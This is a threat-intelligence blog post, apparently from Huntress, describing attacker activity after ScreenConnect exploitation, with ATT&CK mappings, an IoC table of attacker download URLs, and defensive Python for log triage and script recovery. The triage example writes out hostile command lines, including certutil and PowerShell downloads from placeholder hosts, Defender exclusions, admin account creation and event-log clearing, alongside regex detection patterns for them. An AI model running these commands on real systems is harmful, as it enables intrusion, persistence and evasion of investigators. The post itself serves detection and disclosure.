SlashAndGrab: ScreenConnect Post-Exploitation in the Wild (CVE-2024-1709 & CVE-2024-1708)

Since February 19, Huntress has been sharing technical details of the ScreenConnect vulnerability we’re calling “SlashAndGrab.” In previous posts, we covered the vulnerability itself and its exploit, along with detection guidance.

In this article, we’ve collected and curated threat actor activity fresh from the Huntress Security Operations Center (SOC), where our team has detected and kicked out active adversaries leveraging ScreenConnect access for post-exploitation tradecraft.

The adversaries taking advantage of this vulnerability have been VERY busy. There is a lot to cover here, so buckle up and enjoy some tradecraft! 

Adversaries Deploying Ransomware 

A number of adversaries leveraged their newly ill-gotten ScreenConnect gains to deploy ransomware. 

LockBit

With the impressive joint international takedown efforts to disrupt the LockBit ransomware group, many are asking how “LockBit” is still relevant. The LockBit deployments we have seen are invoked with an encryptor whose compile timestamp falls around September 13, 2022, which lines up with the LockBit 3.0 builder that leaked around that time. One observed filename is the classic [.highlight]LB3.exe[.highlight], which again matches the canned, publicly leaked builder. A compile timestamp is trivially edited, so on its own it is corroborating rather than conclusive; here it agrees with the filename and with what the leaked builder is known to produce.

We believe this is an important distinction. While the malware deployed appears associated with LockBit, there is no evidence we’ve seen suggesting the joint international takedown efforts are anything short of a landmark milestone to disrupt one of the largest and most active ransomware groups in the world.
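The compile-timestamp check referred to above is quick to reproduce. The following Python is an added example, not code from the original post or from Huntress: it reads the COFF TimeDateStamp out of a PE header, converts it to a UTC date, and refuses to trust stamps that cannot be evidence (a zeroed value, or one later than the time the sample was observed). The input is a constructed minimal PE image carrying a 2022-09-13 stamp, not the LB3.exe sample itself.

```python
import datetime
import struct


def build_sample_pe(timestamp: int) -> bytes:
    """Constructed sample: a minimal PE image (DOS header + "PE\\0\\0" + COFF
    file header, no sections). It is NOT the LB3.exe sample from this post; it
    only carries the TimeDateStamp the post describes."""
    dos_header = bytearray(64)
    dos_header[0:2] = b"MZ"
    # e_lfanew (offset 0x3C) points at the PE signature; here it follows the DOS header directly.
    struct.pack_into("<I", dos_header, 0x3C, 64)
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    coff_header = struct.pack("<HHIIIHH", 0x8664, 1, timestamp, 0, 0, 0xF0, 0x0022)
    return bytes(dos_header) + b"PE\0\0" + coff_header


def pe_compile_timestamp(data: bytes) -> int:
    """Return the COFF TimeDateStamp (seconds since the Unix epoch) of a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # TimeDateStamp sits 8 bytes past the signature: after Machine (2) and NumberOfSections (2).
    (timestamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return timestamp


def pe_compile_time_utc(data: bytes) -> datetime.datetime:
    """The linker timestamp as an aware UTC datetime."""
    return datetime.datetime.fromtimestamp(pe_compile_timestamp(data), tz=datetime.timezone.utc)


def timestamp_is_plausible(data: bytes, observed_at_epoch: int) -> bool:
    """Sanity check before citing the stamp as evidence. A zeroed stamp means the
    linker value was stripped; a stamp later than the time the sample was first
    observed means it was forged. Reproducible-build toolchains store a hash
    rather than a time in this field, so an absurd date is also a tell."""
    ts = pe_compile_timestamp(data)
    return 0 < ts <= observed_at_epoch


SAMPLE_PE = build_sample_pe(1663027200)  # 2022-09-13T00:00:00Z, constructed value
OBSERVED_AT = 1708560000                 # 2024-02-22T00:00:00Z, constructed observation time

if __name__ == "__main__":
    print("compile time:", pe_compile_time_utc(SAMPLE_PE).isoformat())
    print("plausible:", timestamp_is_plausible(SAMPLE_PE, OBSERVED_AT))
```

Run it against a real sample by passing the file's bytes to pe_compile_time_utc. Treat the answer as one data point to line up with other evidence (filename, builder artefacts, ransom note), never as proof of build date on its own.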

Figure 1: Example of LockBit ransomware executed through ScreenConnect

We’ve included the resulting ransom note associated with the above executable. 

Figure 2: Ransomware note 

Other Ransomware Attempts

We observed other ransomware attempts, like [.highlight]upd.exe[.highlight] and [.highlight]svchost.exe[.highlight], that Microsoft Defender consistently neutralized.

We also observed adversaries use certutil to download ransomware [.highlight].MSI[.highlight] payloads, which they then made persistent by placing them in the Public startup folder.

Figure 3: Example of ransomware added as a persistence mechanism

The ransom note from the threat actor who deployed the MSI has been included as well. 

Figure 4: Example ransomware note

Ransomware Anti-Forensics

Ransomware actors also tried to remove event logs via [.highlight]wevtutil.exe cl[.highlight] to frustrate later analysis by investigators. Fortunately, Huntress Managed EDR is far too perceptive to entertain adversarial frustration. 😉 Clearing logs is itself noisy: wiping the Security log writes Event ID 1102 to the Security log, and wiping any other log writes Event ID 104 to the System log, so the act leaves its own trail.

Figure 5: Example execution of wevtutil.exe log clearing via ScreenConnect

Adversaries Enumerating

There was a particular adversary, operating from [.highlight]185.62.58[.]132[.highlight], executing a script on compromised systems across multiple unique victim networks. The intent of the script was to identify which of their compromised systems offered the highest privileges.

We believe this demonstrates the scale with which threat actors are abusing this vulnerability as they are working to automate their understanding of where to take additional, post-compromise actions moving forward. 

Figure 6: Adversary enumerating the user they control via ScreenConnect 
Figure 7:  Adversary enumerating the user they control via ScreenConnect 

Adversary Cryptocurrency Miners

Somewhat disappointing for a lack of originality, a significant number of adversaries used their ScreenConnect access to deploy cryptocurrency coin miners.

There was a particularly entertaining attempt to masquerade a coinminer as a legitimate SentinelOne file. 

Figure 8: Creation of a coinminer masquerading as SentinelOne

We also observed adversaries downloading and using an XMRig cryptominer, with further details below.

Adversaries Installing Additional Remote Access

Adversaries seemed to commonly install additional, “legitimate” remote access tools, likely as an attempt to remain persistent even once the ScreenConnect fiasco has been cleared up. 

SimpleHelp

An adversary we observed installed the SimpleHelp RMM from their ScreenConnect initial access.

We observed the SimpleHelp RMM agent deployed in the following locations:

  • [.highlight]C:\Users\oldadmin\Documents\Maxx Uptime remote connection\Files\agent.exe[.highlight]
  • [.highlight]C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\restricted\SimpleService.exe[.highlight]
  • [.highlight]C:\Users\oldadmin\Documents\MilsoftConnect\Files\ta.exe[.highlight]
  • [.highlight]C:\Windows\spsrv.exe[.highlight]

We also observed a configuration file dropped to [.highlight]C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml[.highlight], which revealed the agent was configured to communicate with the public IPv4 address [.highlight]91.92.240[.]71[.highlight].

The same [.highlight]oldadmin[.highlight] user was observed running similar commands across multiple unique victim organizations.

Figure 9: Execution of SimpleHelp RMM Agent

SSH

Another threat actor used their ScreenConnect access to download and run an SSH backdoor, seemingly to tunnel an RDP connection through it.

Figure 10: Huntress report for the aforementioned ssh backdoor

Google Chrome Remote Desktop

We also observed an adversary do something quite interesting with Google Chrome’s Remote Desktop. They pulled the installer directly from Google’s own download infrastructure; the installer registers Chrome Remote Desktop as a service, no doubt in the hope that they could persistently and remotely access the environment via a second GUI remote access tool (we enjoy crushing hacker hopes here at Huntress).

Figure 11: Attempted download of Google Chrome’s Remote Desktop client
Figure 12: Huntress platform detecting the persistent installation of Google Chrome’s Remote Desktop client

Downloading Tools and Payloads

A common tradecraft denominator between the adversaries we observed involved them downloading further tools and payloads.

For example, an adversary used PowerShell’s [.highlight]Invoke-WebRequest[.highlight] ([.highlight]iwr[.highlight]) to fetch additional payloads for their persistent SSH tunnel.

Figure 13: Attempted PowerShell cradle download invocation to grab additional post-exploitation tools for SSH tunneling

We also observed an adversary download the SimpleHelp RMM via curl and rename the executables to .png files in an attempt to evade detection (spoiler: they did not evade detection).

Figure 14: SimpleHelp RMM renamed to sun.png, accessed via curl download

We also saw straightforward PowerShell download activity; however, the file had been deleted and the hosting infrastructure was offline by the time of analysis, so the file’s intent could not be determined.

Download Evasion

We also observed adversaries leverage LOLBINs like certutil to download their payloads, likely in an attempt to fly under the radar.

Some adversaries tampered with the host’s antivirus configuration before downloading their payloads. In this specific example, [.highlight]svchost.exe[.highlight] was deleted before analysis could be conducted.

Figure 15: Evidence of a malicious payload download with defense evasion attempt

Adversaries also used their ScreenConnect sessions to reach out and download Cobalt Strike beacons from their external infrastructure. In one case the threat actor hosted the beacon as a [.highlight].PDF[.highlight] on their web server and saved it as a [.highlight].DAT[.highlight] on the targeted machine; both are listed in the IoC table.

Figure 16: Evidence of Cobalt Strike payload download

Transfer.sh

Interestingly, we observed an adversary mass download cryptocurrency miners using the temporary file upload website [.highlight]transfer.sh[.highlight].

Excerpt of the script (full script in the Appendix): 

Figure 17: PowerShell invocation of malicious script downloaded from Transfer.sh

Adversaries Dropping Cobalt Strike

Unsurprisingly, many adversaries attempted to drop and run a Cobalt Strike beacon on the host. 

Figure 18: Setting exclude directory in Windows Defender for the Cobalt Strike beacon
Figure 19: Execution of Cobalt Strike

It’s also worth noting that Defender thwarted many of these attempts, as seen in Figure 20.

Figure 20: Evidence of Windows Defender neutralizing the Cobalt Strike beacon originating from the ScreenConnect session

It was also common to see the same adversaries drop the SentinelUI cryptocurrency miner mentioned earlier and then attempt a Cobalt Strike beacon, which Windows Defender would neutralize.

Figure 21: Evidence of cryptominers and Cobalt Strike being neutralized by Defender

Adversaries Persisting

Adversaries, of course, want to persist in an environment beyond their initial access method, and for good reason: this ScreenConnect vulnerability had rapid mitigations suggested by Huntress and ConnectWise that would have undermined the adversary’s access.

Creating New Users

Our SOC observed a number of adversaries prioritize creating their own users once they landed on a machine, using names chosen to fly under the radar, and then adding those users to highly privileged groups. On the host this leaves Security Event ID 4720 (a user account was created) and, for the group change, 4732 (a member was added to a security-enabled local group such as Administrators); both are worth alerting on when the creating process descends from the ScreenConnect client.

Figure 22: Evidence of adding a new user
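Most of the command-line tradecraft collected above (the wevtutil.exe cl log clearing under Ransomware Anti-Forensics, the certutil, curl and Invoke-WebRequest downloads under Downloading Tools and Payloads, the Defender exclusion in Figure 18, and the account creation here) can be caught from one data source: process-creation telemetry (Sysmon Event ID 1, or Security Event ID 4688 with command-line logging enabled) for processes descending from the ScreenConnect client. The Python below is an added example, not Huntress detection logic: it runs a small rule set over constructed sample events and tags each hit with whether it was spawned via ScreenConnect. The ScreenConnect parent process names and the C:\Windows\TEMP\ScreenConnect\ staging directory are assumptions drawn from the LB3.exe path in the IoC table; the hosts, URLs, account names and command lines are constructed for the example.

```python
import re
from dataclasses import dataclass

# Assumption: these are the ScreenConnect client binaries that parent "Run command"
# activity. Adjust to what your own telemetry shows for the client.
SCREENCONNECT_PARENTS = {"screenconnect.clientservice.exe", "screenconnect.windowsclient.exe"}
# ScreenConnect stages command/file artifacts under this directory (as in the
# LB3.exe IoC path in this post); a command line referencing it is a strong hint.
SCREENCONNECT_TEMP = "\\temp\\screenconnect\\"

RULES = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in [
    ("lolbin_download_certutil", r"\bcertutil(?:\.exe)?\s.*-urlcache\b.*https?://"),
    ("lolbin_download_curl", r"\bcurl(?:\.exe)?\s.*https?://"),
    ("ps_download_cradle", r"\b(?:iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|start-bitstransfer)\b.*https?://"),
    ("event_log_cleared", r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b"),
    ("defender_exclusion_added", r"\badd-mppreference\b.*-exclusion(?:path|process|extension|ipaddress)\b"),
    ("defender_disabled", r"\bset-mppreference\b.*-disablerealtimemonitoring\b"),
    ("local_user_created", r"\bnet1?(?:\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b"),
    ("added_to_admins", r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+.*/add\b"),
]]


@dataclass
class Finding:
    host: str
    rule: str
    command_line: str
    via_screenconnect: bool


def spawned_via_screenconnect(event: dict) -> bool:
    """True when the parent is the ScreenConnect client, or the parent/child command
    line points into the ScreenConnect staging directory."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    if parent in SCREENCONNECT_PARENTS:
        return True
    haystack = (event.get("parent_command_line", "") + " " + event["command_line"]).lower()
    return SCREENCONNECT_TEMP in haystack


def triage(events: list) -> list:
    """Apply every rule to every process-creation event; one Finding per rule hit."""
    findings = []
    for ev in events:
        via = spawned_via_screenconnect(ev)
        for rule, pattern in RULES:
            if pattern.search(ev["command_line"]):
                findings.append(Finding(ev["host"], rule, ev["command_line"], via))
    return findings


def by_host(findings: list) -> dict:
    """Collapse findings to {host: set of rule names} for a quick triage view."""
    out = {}
    for f in findings:
        out.setdefault(f.host, set()).add(f.rule)
    return out


# Constructed sample telemetry (hosts, IPs and names are placeholders, not real IoCs).
SC_STAGED = 'cmd.exe /c "C:\\Windows\\TEMP\\ScreenConnect\\22.5.7881.8171\\example.cmd"'
SC_SERVICE = "C:\\Program Files (x86)\\ScreenConnect Client (example)\\ScreenConnect.ClientService.exe"
CMD = "C:\\Windows\\System32\\cmd.exe"

SAMPLE_EVENTS = [
    {"host": "WS01", "parent_image": CMD, "parent_command_line": SC_STAGED,
     "command_line": "certutil.exe -urlcache -split -f http://198.51.100.10:8084/msappdata.msi c:\\mpyutd.msi"},
    {"host": "WS01", "parent_image": SC_SERVICE, "parent_command_line": SC_SERVICE,
     "command_line": "cmd.exe /c wevtutil.exe cl Security"},
    {"host": "WS02", "parent_image": CMD, "parent_command_line": SC_STAGED,
     "command_line": 'powershell.exe -nop -w hidden -c "Add-MpPreference -ExclusionPath C:\\ProgramData; '
                     'iwr http://198.51.100.10/update.dat -OutFile C:\\ProgramData\\update.dat"'},
    {"host": "WS02", "parent_image": CMD, "parent_command_line": SC_STAGED,
     "command_line": "net.exe user svcbackup Summer2024! /add"},
    {"host": "WS02", "parent_image": CMD, "parent_command_line": SC_STAGED,
     "command_line": "net.exe localgroup administrators svcbackup /add"},
    {"host": "WS03", "parent_image": "C:\\Windows\\explorer.exe", "parent_command_line": "C:\\Windows\\explorer.exe",
     "command_line": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"host": "WS03", "parent_image": CMD, "parent_command_line": "cmd.exe",
     "command_line": "curl.exe -o C:\\Users\\Public\\sun.png https://198.51.100.20/pub/media/wysiwyg/sun.png"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host} {'[ScreenConnect]' if f.via_screenconnect else '[other]':15} {f.rule}: {f.command_line}")
```

The ScreenConnect flag is context, not a filter: the WS03 curl download is still reported, it just lacks the link back to the remote-access session. In production, the same rules belong on the parent chain (ScreenConnect service, then cmd.exe, then the tool), since the "Run command" feature executes a staged .cmd file rather than the tool directly.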

Persistent Reverse Shell

The SOC also observed an adversary transfer [.highlight]C:\perflogs\RunSchedulerTaskOnce.ps1[.highlight] through the compromised ScreenConnect session, as confirmed by the ScreenConnect entries in the Windows Application event log ([.highlight]Application.evtx[.highlight], Event ID 0).

Figure 23: PowerShell execution of a malicious script that included an encoded driver.dll

The script itself had been deleted, but it could be partially restored from the PowerShell Operational EVTX: script block logging (Event ID 4104) records each script in fragments that share a ScriptBlockId, and re-stitching those fragments in order recovers the code (excerpt of the recovered script below).

Figure 24: Extract of  PowerShell code from PowerShell Operational EVTX
Figure 25: Extract of deobfuscated PowerShell code from CyberChef
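Reassembling a deleted script from script block logging, as described above, works because Microsoft-Windows-PowerShell/Operational Event ID 4104 records a large script as several fragments that share a ScriptBlockId and carry MessageNumber and MessageTotal. The Python below is an added example of that re-stitching, not the script Huntress used: it groups constructed 4104 events by ScriptBlockId, orders the fragments, reports any gaps (fragments that rolled out of the log, or a block that was only partially captured), and then pulls Base64 blobs out of the recovered text the way CyberChef was used in Figure 25. The script text, ScriptBlockIds and the embedded blob are constructed placeholders, not the actor's RunSchedulerTaskOnce.ps1 or driver.dll.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Constructed stand-in for an embedded payload: an "MZ" prefix and a marker, not a real DLL.
PLACEHOLDER_DLL = b"MZ" + b"\x00" * 6 + b"constructed placeholder, not a real DLL"

# Constructed stand-in for the staging script (writes the blob to %ProgramData%\driver.dll).
STAGE_SCRIPT = (
    "# constructed sample, not the actor's script\n"
    "$p = \"$env:ProgramData\\driver.dll\"\n"
    "$b = '" + base64.b64encode(PLACEHOLDER_DLL).decode() + "'\n"
    "[IO.File]::WriteAllBytes($p, [Convert]::FromBase64String($b))\n"
)
SIDE_SCRIPT = "Get-ChildItem C:\\perflogs | Select-Object -ExpandProperty FullName\n"

STAGE_ID = "0f3b6a2e-1111-4c55-9a11-0000000000a1"  # constructed ScriptBlockId values
SIDE_ID = "0f3b6a2e-2222-4c55-9a11-0000000000b2"


def fragment_4104(script_block_id: str, text: str, path: str, chunk: int) -> list:
    """Mimic script block logging: one 4104 record per fragment of the script."""
    pieces = [text[i:i + chunk] for i in range(0, len(text), chunk)]
    return [
        {"EventID": 4104, "ScriptBlockId": script_block_id, "MessageNumber": n,
         "MessageTotal": len(pieces), "ScriptBlockText": piece, "Path": path}
        for n, piece in enumerate(pieces, 1)
    ]


_full = fragment_4104(STAGE_ID, STAGE_SCRIPT, "C:\\perflogs\\RunSchedulerTaskOnce.ps1", 48)
_partial = [e for e in fragment_4104(SIDE_ID, SIDE_SCRIPT, "", 24) if e["MessageNumber"] != 2]
# Out of order on purpose: an EVTX export is not guaranteed to be sorted by fragment.
SAMPLE_4104_EVENTS = list(reversed(_full + _partial))


@dataclass
class ReassembledBlock:
    script_block_id: str
    path: str
    text: str
    missing: list = field(default_factory=list)

    @property
    def complete(self) -> bool:
        return not self.missing


def reassemble(events: list) -> list:
    """Group 4104 fragments by ScriptBlockId, order by MessageNumber, join, and
    record which fragment numbers (1..MessageTotal) were never seen."""
    groups = {}
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        groups.setdefault(ev["ScriptBlockId"], []).append(ev)
    blocks = []
    for sbid, frags in groups.items():
        frags.sort(key=lambda e: e["MessageNumber"])
        total = frags[0]["MessageTotal"]
        seen = {e["MessageNumber"] for e in frags}
        missing = sorted(set(range(1, total + 1)) - seen)
        text = "".join(e["ScriptBlockText"] for e in frags)
        blocks.append(ReassembledBlock(sbid, frags[0].get("Path", ""), text, missing))
    return blocks


_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_base64_blobs(text: str) -> list:
    """Decode every long Base64 run in a recovered script; skip runs that are not valid Base64."""
    blobs = []
    for m in _B64_RUN.finditer(text):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True))
        except binascii.Error:
            pass
    return blobs


if __name__ == "__main__":
    for block in reassemble(SAMPLE_4104_EVENTS):
        state = "complete" if block.complete else f"missing fragments {block.missing}"
        print(f"{block.script_block_id} ({block.path or 'no path'}): {state}")
        for blob in extract_base64_blobs(block.text):
            print("  embedded blob:", blob[:2], len(blob), "bytes")
```

On a real export, feed it the EventData fields of each 4104 record (for example from python-evtx or Get-WinEvent output); the reassembly only needs ScriptBlockId, MessageNumber, MessageTotal and ScriptBlockText. A block with gaps is still worth reading, since the Base64 payload often survives intact in the fragments that remain.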

This script would deliver [.highlight]driver.dll[.highlight] to the host and set up persistence through a WMI event subscription (named [.highlight]System__Cmr[.highlight]) whose consumer launches PowerShell. Such subscriptions live in the WMI repository rather than the registry, so the check is to enumerate the __EventFilter, __EventConsumer and __FilterToConsumerBinding classes in the root\subscription namespace.

Figure 26: Evidence of the encoded script’s persistence mechanism in the Huntress platform

Wrapping Up

This incredibly interesting ScreenConnect exploit has enamored many of us at Huntress for the last few days, but it’s a shame our adversaries didn’t commit to pairing this new exploit with new tradecraft.

It’s worth driving this point home: most of the post-compromise activities we have documented in this article aren’t novel, original, or outstanding. Most threat actors simply don’t know what to do beyond the same usual, procedural tradecraft; cybercriminals are rarely sophisticated, and the infosec community can beat them together.

Adversaries will default to their “tried and true” methods. An experienced, talented security team can neutralize most threat actors in the middle of their campaigns with ease. We hope this article inspires your security mindset. If you need any help monitoring for activity related to this vulnerability, you can use Huntress' free trial.

If you’re interested in more, come and check out the next episode of our Product Lab webinar, where we’ll be sharing even more technical details behind this threat and answer any questions from the community.

Appendix

ATT&CK

Tactic | Technique | Description
Initial Access | T1190: Exploit Public-Facing Application | Adversaries are leveraging a path traversal bug and authentication bypass in ScreenConnect that allows them to create a privileged account for remote control.
Discovery | T1087: Account Discovery | Adversaries are attempting to discover privileged users by running a script across compromised systems.
Defense Evasion | T1562.001: Disable or Modify Tools | Adversaries are attempting to evade detection by adding exclusion paths to Windows Defender using PowerShell.
Defense Evasion | T1070.001: Clear Windows Event Logs | Ransomware actors attempt to remove event logs using the wevtutil.exe cl command to hinder forensic analysis.
Execution | T1059: Command and Scripting Interpreter; T1059.001: PowerShell; T1059.003: Windows Command Shell | Adversaries are using PowerShell and CMD to download and execute scripts from remote locations, facilitating activities such as cryptocurrency mining and remote access.
Persistence | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Adversaries stored their MSI ransomware payload in the Public startup folder.
Persistence | T1136: Create Account | Adversaries created new users and in some instances added them to privileged groups.
Persistence | T1053: Scheduled Task | Adversaries are creating scheduled tasks for their cryptominers and remote access.
Persistence | T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription | Adversaries are registering WMI event subscriptions (filter, consumer and binding objects in the WMI repository) to achieve persistence.
Persistence | T1133: External Remote Services | Adversaries are compromising ScreenConnect instances, then deploying SSH tunnels, Chrome Remote Desktop and alternate RMMs for evasive, persistent remote access.
Command and Control | T1105: Ingress Tool Transfer | Adversaries are downloading files using curl, certutil and Invoke-WebRequest.
Command and Control | T1572: Protocol Tunneling | Adversaries created SSH tunnels for communication.
Impact | T1496: Resource Hijacking | Cryptocurrency miners are being deployed by adversaries.
Impact | T1486: Data Encrypted for Impact | Adversaries deployed ransomware via compromised ScreenConnect.
Software | S0154: Cobalt Strike | Adversaries are leveraging Cobalt Strike beacons to achieve C2 connections to compromised ScreenConnect machines.

IoCs

Indicators written as "URL -> path" give the download source and the location the file was saved to on the host. Hashes are SHA-256.

IoC Type | Indicator | Hash (SHA-256)
Ransomware | C:\Windows\TEMP\ScreenConnect\22.5.7881.8171\LB3.exe | 78a11835b48bbe6a0127b777c0c3cc102e726205f67afefcd82f073e56489e49
Ransomware | http[:]//23.26.137[.]225:8084/msappdata.msi -> c:\mpyutd.msi | 8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
Ransomware | UPX.exe | 2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a
Ransomware | svchost.exe | a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0
Cryptocurrency Miner | hxxps[://]transfer[.]sh/GElU1LmvbS/injcet.ps1 | ec49f5033374eb8f533e291111e1433e2da127f45857aebbbe614e711b3ca989
Cobalt Strike | hxxp[://]minish[.]wiki[.]gd/c[.]pdf -> C:\programdata\update[.]dat | 0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fe
Cobalt Strike | C:\perflogs\RunSchedulerTaskOnce.ps1 | 6065fee2d0cb0dc7d0c0788e7e9424088e722dfcf9356d20844d7b2d75b20163
Cobalt Strike | copy.exe | 81b4a649a42a157facede979828095ccddcdf6cec47e8a3156530e0c02e9625e
Google Chrome Remote Desktop | https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi -> C:\ProgramData\1.msi | c47bfe3b3eccc86f87d2b6a38f0f39968f6147c2854f51f235454a54e2134265
SimpleHelp RMM | https[:]//cmctt[.]com/pub/media/wysiwyg/sun.png -> C:\Windows\spsrv.exe | e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793
SimpleHelp RMM | cmctt[.]com/pub/media/wysiwyg/invoke.png | 37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231b
SimpleHelp RMM | C:\Users\oldadmin\Documents\Maxx Uptime remote connection\Files\agent.exe | a0fd0ceb95e775a48a95c00eab42fa5bb170f552005c38812fd03ab4cc14932e
SimpleHelp RMM | C:\ProgramData\JWrapper-Remote Access\JWAppsSharedConfig\serviceconfig.xml | 2e0df44dd75dbdbd70f1a777178ad8a1867cf0738525508b6120ba21f4505f47
SimpleHelp RMM IPv4 | 91.92.240[.]71 | n/a
SSH Script | d | 69c7fc246c4867f070e1a7b80c7c41574ee76ab54a8b543a1e0f20ce4a0d5cde
SSH Script | Z.zip | aa9f5ed1eede9aac6d07b0ba13b73185838b159006fa83ed45657d7f333a0efe
Beacon | driver.dll | 6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090
Unknown | 159[.]65[.]130[.]146:4444/svchost.exe -> C:\Windows\Temp\svchost.exe | n/a
Cryptocurrency Miner | http://185[.]232[.]92[.]32:8888/SentinelUI.exe | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/6bkwRh4NXd/config4[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/PRBRzMMEKC/config3[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/RWSn6NLIr7/config2[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/MRFibhy8fS/config1[.]json | n/a
Cryptocurrency Miner | hxxps[://]transfer[.]sh/FeDRSFU5XV/config[.]json | n/a

Contents of inject.ps1 - Crypto Currency Miner

Acknowledgments

Thank you to the following Huntress SOC analysts for their triage and reporting of the various adversarial activities included in this report: Adrian Garcia, Amelia Casley, Chad Hudson, Dani Dayal, Christopher ‘Dipo’ Rodipe, Dray Agha, Faith Stratton, Herbie Zimmerman, Izzy Spering, Jai Minton, John ‘JB’ Brennan, Jordan Sexton, Josh Allman, Mehtap Ozdemir, Michael Elford, Stephanie Fairless, Susie Faulkner, Tim Kasper.

Special thanks to Josh Allman and Dray Agha for further analysis, and collecting and curating this blog.
